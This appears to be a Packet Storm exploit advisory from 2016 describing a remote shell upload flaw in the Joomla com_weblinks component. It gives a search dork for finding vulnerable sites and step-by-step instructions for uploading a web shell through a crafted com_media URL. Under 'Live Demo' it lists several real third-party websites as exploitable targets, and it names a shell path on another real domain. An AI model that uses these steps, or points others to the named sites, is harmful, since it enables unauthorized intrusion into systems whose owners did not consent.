The Joomla Weblinks component suffers from a remote shell upload vulnerability.
43c2692dbcc9023249dc7dcc905354ee474b5b51e10fc0837f5a1f16ea956d50################################################################
# Exploit Title : Joomla com_weblinks Shell Upload Vulnerability
# Exploit Author : howucan
# Website : http://howucan.gr
# Dork : allinurl:/index.php?option e_name jform_description
asset=com_weblinks
# Software link :
http://extensions.joomla.org/extensions/extension/official-extensions/weblinks
# Tested on: [ Kali Linux 2 ]
# Date: 2016/07/24
# video Proof : https://www.youtube.com/watch?v=rHM8XJUhBzQ
#
######################
# [+] PoC :
######################
# 1 Select A Website From The Dork Above
# 2
http://localhost/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
# 3 Just Upload your Shell or Txt or Image to Upload Field
# 4 Shell Directory : http://localhost/site/images/shell.txt
# Ex http://www.verenikelife2009.gr/images/a.txt
######################
# [+] Live Demo:
#
http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
#
http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
#
http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=
#################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed